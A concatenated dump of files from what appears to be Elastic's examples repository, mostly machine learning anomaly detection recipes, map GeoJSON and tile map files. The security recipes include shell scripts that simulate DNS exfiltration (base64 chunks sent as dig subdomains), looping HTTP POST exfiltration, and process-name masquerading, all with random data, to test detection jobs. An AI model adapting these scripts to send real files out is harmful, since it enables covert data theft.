--------------------------------------------------------------------------------
/Machine Learning/Regression Loss Functions/README.md:
--------------------------------------------------------------------------------
 1 | # Regression Loss Functions
 2 | 
 3 | This notebook explains the properties of different loss functions available for the
 4 | machine learning data frame analytics regression jobs and give pointers on when to
 5 | choose which loss function.
 6 | 
 7 | Set up a local instance of Jupyter using the following instructions
 8 | 
 9 | 1. Set up a virtual environment called `env` 
10 | 
11 | ```
12 | python3 -m venv env
13 | ``` 
14 | 
15 | 2. Activate it
16 | 
17 | ```
18 | source env/bin/activate
19 | ```
20 | 
21 | 3. Install the required dependencies for your chosen Jupyter notebook
22 | 
23 | ```
24 | pip install -r requirements.txt
25 | ```
26 | 
27 | 4. Launch Jupyter
28 | 
29 | ```
30 | jupyter notebook
31 | ```
32 | 
33 | 


--------------------------------------------------------------------------------
/Machine Learning/Regression Loss Functions/requirements.txt:
--------------------------------------------------------------------------------
1 | ipykernel==5.1.3
2 | jupyter==1.0.0
3 | matplotlib==3.1.1
4 | numpy==1.18.1
5 | scikit-learn==0.22.2
6 | sympy==1.6.1
7 | 


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/README.md:
--------------------------------------------------------------------------------
1 | **Update**: These recipes are now perhaps irrelevant and outdated given that the Elastic SIEM now has built-in ML detection jobs as described here: https://www.elastic.co/guide/en/siem/guide/current/prebuilt-ml-jobs.html and https://github.com/elastic/detection-rules/tree/main/rules/ml
2 | 
3 | Each subfolder contains information that will allow you to configure, run, and test an example Security Analytics machine learning use case. Security Analytics use cases detect anomalies associated with elementary cyber attack behaviors. Each detected anomaly is assigned a normalized Anomaly Score, and is annotated with values of other fields in the data that have statistical influence on the anomaly, called influencers. Elementary attack behaviors that share common statistical influencers are often related to a common attack progression.
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/TODO:
--------------------------------------------------------------------------------
1 | 1. Update the image on the README
2 | 2. Review the README format
3 | 3. Maybe a single load script for the ingest pipeline and the job load?
4 | 4. May need to change interface from en0


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/configs/ingest/extract_subdomain.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "Adds subdomain and domain fields",
 3 |   "processors": [
 4 |     {
 5 |       "script": {
 6 |         "lang": "painless",
 7 |         "inline": "boolean isValue(def x){ x != null } if (isValue(ctx?.dns?.question?.name) && isValue(ctx?.dns?.question.etld_plus_one)) { def sub_domain = ctx.dns.question.name.replace(ctx.dns.question.etld_plus_one,''); ctx.domain = ctx.dns.question.etld_plus_one; if (sub_domain != 'www.' && sub_domain != ''){ ctx.sub_domain=sub_domain;}}"
 8 |       }
 9 |     }
10 |   ]
11 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/configs/packetbeat/packetbeat.yml:
--------------------------------------------------------------------------------
 1 | packetbeat.interfaces.device: en0
 2 | packetbeat.protocols.dns:
 3 |   ports: [53]
 4 |   include_authorities: true
 5 |   include_additionals: true
 6 | name: test
 7 | output.elasticsearch:
 8 |   # Array of hosts to connect to.
 9 |   hosts: ["localhost:9200"]
10 |   # Optional protocol and basic auth credentials.
11 |   #protocol: "https"
12 |   username: "elastic"
13 |   password: "changeme"
14 |   pipeline: "extract_subdomain"
15 | #logging.level: debug
16 | logging.selectors: ["*"]


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "dns_exfiltration",
 3 |   "indexes": [
 4 |     "packetbeat-*"
 5 |   ],
 6 |   "types": [
 7 |     "dns"
 8 |   ],
 9 |   "query": {
10 |     "match_all": {}
11 |   },
12 |   "scroll_size": 1000,
13 |   "query_delay": "60s",
14 |   "frequency": "150s"
15 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "dns_exfiltration",
 3 |   "description": "dns exfiltration",
 4 |   "analysis_config": {
 5 |     "bucket_span": "5m",
 6 |     "latency": "0s",
 7 |     "detectors": [
 8 |       {
 9 |         "detector_description": "high_info_content(sub_domain) over domain",
10 |         "function": "high_info_content",
11 |         "field_name": "sub_domain",
12 |         "over_field_name": "domain",
13 |         "exclude_frequent": "ALL",
14 |         "detector_rules": []
15 |       }
16 |     ],
17 |     "influencers": [
18 |       "beat.name",
19 |       "domain"
20 |     ],
21 |     "use_per_partition_normalization": false
22 |   },
23 |   "data_description": {
24 |     "format": "delimited",
25 |     "time_field": "@timestamp",
26 |     "time_format": "epoch",
27 |     "field_delimiter": "\t",
28 |     "quote_character": "\""
29 |   },
30 |   "model_plot_config": {
31 |       "enabled" : true
32 |   }
33 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/scripts/dns_exfil_random.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | ### Trivial one-liner bash-based file exfil over dns example - random data
 3 | ###
 4 | #
 5 | # Usage: $0 <dns_server_ip> <zone suffix/hrd>
 6 | #
 7 | # Ex. ./dns_exfil_random.sh 8.8.8.8 elastic.co
 8 | #
 9 | 
10 | if [[ -n $1 && -n $2 ]]; then count=0 ; dd if=/dev/urandom bs=1 count=64k 2>/dev/null| base64 -w 63 | while read line; do line=$(echo $line |tr -d '\n') ; req=$(echo "${count}.$line") ; dig "${count}.${line}.${2}" @${1}; count=$((count+1)) ; done; fi


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/scripts/dns_exfil_random_osx.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | ### OSX Trivial one-liner bash-based file exfil over dns example - random data
 3 | ###
 4 | #
 5 | # Usage: $0 <dns_server_ip> <zone suffix/hrd>
 6 | #
 7 | # Ex. ./client.sh 8.8.8.8 elastic.co
 8 | #
 9 | 
10 | if [[ -n $1 && -n $2 ]]; then count=0 ; dd if=/dev/urandom bs=1 count=64k 2>/dev/null| base64 -b 63 | while read line; do line=$(echo $line |tr -d '\n') ; req=$(echo "${count}.$line") ; dig "${count}.${line}.${2}" @${1}; count=$((count+1)) ; done; fi


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/configs/packetbeat/packetbeat.yml:
--------------------------------------------------------------------------------
 1 | packetbeat.interfaces.device: en0
 2 | packetbeat.protocols.http:
 3 | #Add port here if using a port other than 3333.
 4 |   ports: [80, 8080, 8000, 5000, 8002, 3333]
 5 |   send_all_headers: true
 6 | name: test
 7 | output.elasticsearch:
 8 |   # Array of hosts to connect to.
 9 |   hosts: ["localhost:9200"]
10 |   # Optional protocol and basic auth credentials.
11 |   #protocol: "https"
12 |   username: "elastic"
13 |   password: "changeme"
14 | logging.selectors: ["*"]
15 | 


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "http_exfiltration",
 3 |   "indexes": [
 4 |     "packetbeat-*"
 5 |   ],
 6 |   "types": [
 7 |     "http"
 8 |   ],
 9 |   "query": {
10 |     "term": {
11 |       "direction": {
12 |         "value": "out"
13 |       }
14 |     }
15 |   },
16 |   "scroll_size": 1000,
17 |   "query_delay": "60s",
18 |   "frequency": "150s"
19 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "http_exfiltration",
 3 |   "description": "http data exfiltration",
 4 |   "analysis_config": {
 5 |     "bucket_span": "5m",
 6 |     "latency": "0s",
 7 |     "detectors": [
 8 |       {
 9 |         "detector_description": "high_sum(bytes_in) over \"http.request.headers.host\" partitionfield=\"beat.name\" excludefrequent=all",
10 |         "function": "high_sum",
11 |         "field_name": "bytes_in",
12 |         "over_field_name": "http.request.headers.host",
13 |         "exclude_frequent": "all"
14 |       }
15 |     ],
16 |     "influencers": [
17 |       "beat.name",
18 |       "http.request.headers.host"
19 |     ]
20 |   },
21 |   "data_description": {
22 |     "time_field": "@timestamp"
23 |   },
24 |   "model_plot_config": {
25 |       "enabled" : true
26 |   }
27 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/scripts/client.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | ### Client side script to send random data over http to imitate an HTTP exfilfration signature.
 4 | ### This script relies on a receiving server - this is provided through server.sh.
 5 | #
 6 | # Usage: $0 <server_host> [server_port]
 7 | #  - <server_host>. Required.
 8 | #  - <server_port> optional and defaults to 3333
 9 | #
10 | # Ex. ./client.sh localhost
11 | #
12 | 
13 | if [ -z "$1" ]
14 |   then
15 |     echo "No hostname supplied - Usage: $0 <hostname> [port]"
16 |     exit 1
17 | fi
18 | 
19 | HOST=$1
20 | 
21 | PORT=3333
22 | if [ "$2" ]; then
23 |   PORT=$2
24 | fi
25 | 
26 | while true; do
27 |     cmd=$(dd if=/dev/urandom bs=1 count=1k 2>/dev/null |  curl -s -X POST -H "Content-Type: text/plain" --data-binary @- $HOST:$PORT)
28 | done


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/scripts/server.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | ### Simple HTTP server to receive bytes over http. To be used in conjunction with client.sh to recieve random bytes and immiate a HTTP exfilfration signature.
 4 | #
 5 | # Usage: $0 <port>
 6 | #  - <port> defaults to 3333
 7 | #
 8 | # Ex. ./server.sh 5555
 9 | #
10 | PORT=3333
11 | if [ "$2" ]; then
12 |   PORT=$2
13 | fi
14 | 
15 | socat \
16 |     TCP-LISTEN:$PORT,crlf,reuseaddr,fork \
17 |     SYSTEM:"
18 |         echo HTTP/1.1 200 OK;
19 |         echo Content-Type\: text/plain;
20 |         echo Content-Length\: 0;
21 |         echo;
22 |         echo;
23 |     "
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_login_activity/configs/filebeat/filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.modules:
 2 | - module: system
 3 |   syslog:
 4 |     enabled: false
 5 |   auth:
 6 |     enabled: true
 7 |     var.paths: ["/opt/demos/ml-recipes/recipes/security/suspicious_login_activity/data/auth.log"]
 8 | name: test
 9 | output.elasticsearch:
10 |   # Array of hosts to connect to.
11 |   hosts: ["localhost:9200"]
12 |   # Optional protocol and basic auth credentials.
13 |   #protocol: "https"
14 |   username: "elastic"
15 |   password: "changeme"
16 |   index: "filebeat"
17 | logging.level: debug
18 | logging.selectors: ["publish"]


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_login_activity/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "datafeed_id": "datafeed-suspicious_login_activity",
 3 |   "job_id": "suspicious_login_activity",
 4 |   "indexes": [
 5 |     "filebeat-*"
 6 |   ],
 7 |   "types": [
 8 |     "doc"
 9 |   ],
10 |   "query": {
11 |       "query_string": {
12 |         "query": "system.auth.ssh.event:Failed OR system.auth.ssh.event:Invalid",
13 |         "fields": [],
14 |         "use_dis_max": true,
15 |         "auto_generate_phrase_queries": false,
16 |         "max_determinized_states": 10000,
17 |         "enable_position_increments": true,
18 |         "fuzziness": "AUTO",
19 |         "fuzzy_prefix_length": 0,
20 |         "fuzzy_max_expansions": 50,
21 |         "phrase_slop": 0,
22 |         "analyze_wildcard": true,
23 |         "escape": false,
24 |         "split_on_whitespace": true,
25 |         "boost": 1
26 |       }
27 |   },
28 |   "scroll_size": 1000,
29 |   "query_delay": "60s",
30 |   "frequency": "150s"
31 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_login_activity/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "suspicious_login_activity",
 3 |   "description": "suspicious login activity",
 4 |   "job_type": "anomaly_detector",
 5 |   "analysis_config": {
 6 |     "bucket_span": "5m",
 7 |     "detectors": [
 8 |       {
 9 |         "detector_description": "high_count",
10 |         "function": "high_count",
11 |         "partition_field_name": "system.auth.hostname",
12 |         "detector_rules": []
13 |       }
14 |     ],
15 |     "influencers": [
16 |       "system.auth.hostname",
17 |       "system.auth.user",
18 |       "system.auth.ssh.ip"
19 |     ]
20 |   },
21 |   "data_description": {
22 |     "time_field": "@timestamp",
23 |     "time_format": "epoch_ms"
24 |   },
25 |   "model_plot_config": {
26 |       "enabled" : true
27 |   }
28 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_process_activity/configs/filebeat/filebeat.yml:
--------------------------------------------------------------------------------
 1 | ###################### Filebeat Configuration Example #########################
 2 | 
 3 | #==========================  Modules configuration ============================
 4 | name: test
 5 | 
 6 | filebeat.modules:
 7 | #------------------------------- Auditd Module -------------------------------
 8 | - module: auditd
 9 |   log:
10 |     prospector:
11 |       include_lines: ['^type=EXECVE']
12 | 
13 | #================================ Outputs =====================================
14 | 
15 | #-------------------------- Elasticsearch output ------------------------------
16 | output.elasticsearch:
17 |   # Array of hosts to connect to.
18 |   hosts: ["localhost:9200"]
19 |   username: "elastic"
20 |   password: "changeme"


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_process_activity/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "datafeed_id": "datafeed-unusual_process",
 3 |   "job_id": "unusual_process",
 4 |   "query": {
 5 |     "term": {
 6 |       "auditd.log.record_type": {
 7 |         "value": "EXECVE"
 8 |       }
 9 |     }
10 |   },
11 |   "query_delay": "60s",
12 |   "frequency": "300s",
13 |   "scroll_size": 1000,
14 |   "indexes": [
15 |     "filebeat-*"
16 |   ],
17 |   "types": [
18 |     "doc"
19 |   ]
20 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_process_activity/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "unusual_process",
 3 |   "description": "unusual process",
 4 |   "analysis_config": {
 5 |     "bucket_span": "10m",
 6 |     "influencers": [
 7 |       "auditd.log.a0",
 8 |       "beat.name"
 9 |     ],
10 |     "detectors": [
11 |       {
12 |         "function": "rare",
13 |         "by_field_name": "auditd.log.a0",
14 |         "partition_field_name": "beat.name"
15 |       }
16 |     ]
17 |   },
18 |   "data_description": {
19 |     "time_field": "@timestamp",
20 |     "time_format": "epoch_ms"
21 |   },
22 |   "model_plot_config": {
23 |       "enabled" : true
24 |   }
25 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_process_activity/scripts/start_random_process.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | file_name=$(hexdump -n 4 -e '4/4 "%08X" 1 "\n"' /dev/random)
3 | echo $file_name
4 | bash -c "exec -a $file_name sleep 10"


--------------------------------------------------------------------------------
/Maps/Getting Started Examples/geojson_upload_and_styling/bangor_international_airport.geojson:
--------------------------------------------------------------------------------
1 | {
2 | "type": "FeatureCollection",
3 | "name": "bangor_international_airport",
4 | "crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
5 | "features": [
6 | { "type": "Feature", "properties": { }, "geometry": { "type": "Point", "coordinates": [ -68.825774282298767, 44.80601309218136 ] } }
7 | ]
8 | }
9 | 


--------------------------------------------------------------------------------
/Maps/Getting Started Examples/geojson_upload_and_styling/logan_international_airport.geojson:
--------------------------------------------------------------------------------
1 | {
2 | "type": "FeatureCollection",
3 | "name": "logan_international_airport",
4 | "crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
5 | "features": [
6 | { "type": "Feature", "properties": { }, "geometry": { "type": "Point", "coordinates": [ -71.004550070725642, 42.364101185471185 ] } }
7 | ]
8 | }
9 | 


--------------------------------------------------------------------------------
/Maps/Getting Started Examples/geojson_upload_and_styling/modified_flight_path.geojson:
--------------------------------------------------------------------------------
1 | {
2 | "type": "FeatureCollection",
3 | "name": "original_flight_path",
4 | "crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
5 | "features": [
6 | { "type": "Feature", "properties": { }, "geometry": { "type": "LineString", "coordinates": [ [ -71.00192980731326, 42.362430078961033 ], [ -70.919524749846204, 43.6519362548866 ], [ -70.599875089458095, 44.29554107328692 ], [ -69.592677689750033, 44.672089214951654 ], [ -68.829108982759479, 44.808036568889044 ] ] } }
7 | ]
8 | }
9 | 


--------------------------------------------------------------------------------
/Maps/Getting Started Examples/geojson_upload_and_styling/original_flight_path.geojson:
--------------------------------------------------------------------------------
1 | {
2 | "type": "FeatureCollection",
3 | "name": "original_flight_path",
4 | "crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
5 | "features": [
6 | { "type": "Feature", "properties": { }, "geometry": { "type": "LineString", "coordinates": [ [ -71.001880654548103, 42.362468962533292 ], [ -69.82139571080863, 43.267559778102239 ], [ -68.92614280820797, 44.381551026535575 ], [ -68.829108982759479, 44.808036568889044 ] ] } }
7 | ]
8 | }
9 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/__init__.py


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/elastic{ON}_full_floor_plan.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/elastic{ON}_full_floor_plan.pdf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/requirements.txt:
--------------------------------------------------------------------------------
1 | appdirs==1.4.3
2 | elasticsearch==5.3.0
3 | packaging==16.8
4 | pyparsing==2.2.0
5 | six==1.10.0
6 | urllib3==1.21
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.dbf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_booths.dbf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.prj:
--------------------------------------------------------------------------------
1 | GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.qix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_booths.qix


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.qpj:
--------------------------------------------------------------------------------
1 | GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]
2 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.shp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_booths.shp


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.shx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_booths.shx


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.dbf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_stands.dbf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.prj:
--------------------------------------------------------------------------------
1 | GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.qix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_stands.qix


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.qpj:
--------------------------------------------------------------------------------
1 | GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]
2 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.shp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_stands.shp


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.shx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_stands.shx


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.dbf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/inner_wall.dbf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.prj:
--------------------------------------------------------------------------------
1 | GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.qix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/inner_wall.qix


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.qpj:
--------------------------------------------------------------------------------
1 | GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]
2 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.shp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/inner_wall.shp


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.shx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/inner_wall.shx


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.dbf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/outer_wall.dbf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.prj:
--------------------------------------------------------------------------------
1 | GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.qix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/outer_wall.qix


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.qpj:
--------------------------------------------------------------------------------
1 | GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]
2 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.shp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/outer_wall.shp


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.shx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/outer_wall.shx


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/styles/demo_booths.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="ISO-8859-1"?>
 2 | <StyledLayerDescriptor version="1.0.0"
 3 |   xsi:schemaLocation="http://www.opengis.net/sld http://schemas.opengis.net/sld/1.0.0/StyledLayerDescriptor.xsd"
 4 |   xmlns="http://www.opengis.net/sld" xmlns:ogc="http://www.opengis.net/ogc"
 5 |   xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 6 | 
 7 |   <NamedLayer>
 8 |     <Name>teal_line</Name>
 9 |     <UserStyle>
10 |       <Title>A teal line style</Title>
11 |       <FeatureTypeStyle>
12 |         <Rule>
13 |           <Title>teal line</Title>
14 |           <LineSymbolizer>
15 |             <Stroke>
16 |               <CssParameter name="stroke">#00BFB3</CssParameter>
17 |               <CssParameter name="stroke-width">0.5</CssParameter>
18 |             </Stroke>
19 |           </LineSymbolizer>
20 |         </Rule>
21 | 
22 |       </FeatureTypeStyle>
23 |     </UserStyle>
24 |   </NamedLayer>
25 | </StyledLayerDescriptor>


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/styles/inner_walls.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="ISO-8859-1"?>
 2 | <StyledLayerDescriptor version="1.0.0"
 3 |   xsi:schemaLocation="http://www.opengis.net/sld http://schemas.opengis.net/sld/1.0.0/StyledLayerDescriptor.xsd"
 4 |   xmlns="http://www.opengis.net/sld" xmlns:ogc="http://www.opengis.net/ogc"
 5 |   xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 6 | 
 7 |   <NamedLayer>
 8 |     <Name>black_line</Name>
 9 |     <UserStyle>
10 |       <Title>A black line style</Title>
11 |       <FeatureTypeStyle>
12 |         <Rule>
13 |           <Title>black line</Title>
14 |           <LineSymbolizer>
15 |             <Stroke>
16 |               <CssParameter name="stroke">#000000</CssParameter>
17 |             </Stroke>
18 |           </LineSymbolizer>
19 |         </Rule>
20 | 
21 |       </FeatureTypeStyle>
22 |     </UserStyle>
23 |   </NamedLayer>
24 | </StyledLayerDescriptor>
25 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/styles/outer_walls.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="ISO-8859-1"?>
 2 | <StyledLayerDescriptor version="1.0.0"
 3 |   xsi:schemaLocation="http://www.opengis.net/sld http://schemas.opengis.net/sld/1.0.0/StyledLayerDescriptor.xsd"
 4 |   xmlns="http://www.opengis.net/sld" xmlns:ogc="http://www.opengis.net/ogc"
 5 |   xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 6 |   <NamedLayer>
 7 |     <Name>outer_walls</Name>
 8 |     <UserStyle>
 9 |       <Title>An outer wall style</Title>
10 |       <FeatureTypeStyle>
11 |         <Rule>
12 |           <Title>outer wall line</Title>
13 |           <LineSymbolizer>
14 |             <Stroke>
15 |               <CssParameter name="stroke">#000000</CssParameter>
16 |               <CssParameter name="stroke-width">3</CssParameter>
17 |             </Stroke>
18 |           </LineSymbolizer>
19 |         </Rule>
20 | 
21 |       </FeatureTypeStyle>
22 |     </UserStyle>
23 |   </NamedLayer>
24 | </StyledLayerDescriptor>
25 | 


--------------------------------------------------------------------------------
/Miscellaneous/docker/CHANGES.md:
--------------------------------------------------------------------------------
 1 | 
 2 | TODO
 3 | 
 4 | 1. Static content?
 5 | 1. MEtricbeat reports its host for system modeul as "metricbeat" - change to X?
 6 | 1. Docker-logs, apache dashboards?
 7 | 1. Dynamic loading of config - beats and LS.
 8 | 1. What does windows do with the /var/log entry? use the VMS
 9 | 
10 | 
11 | 
12 | Questions
13 | 
14 | 1. Processors in beats? worth it?
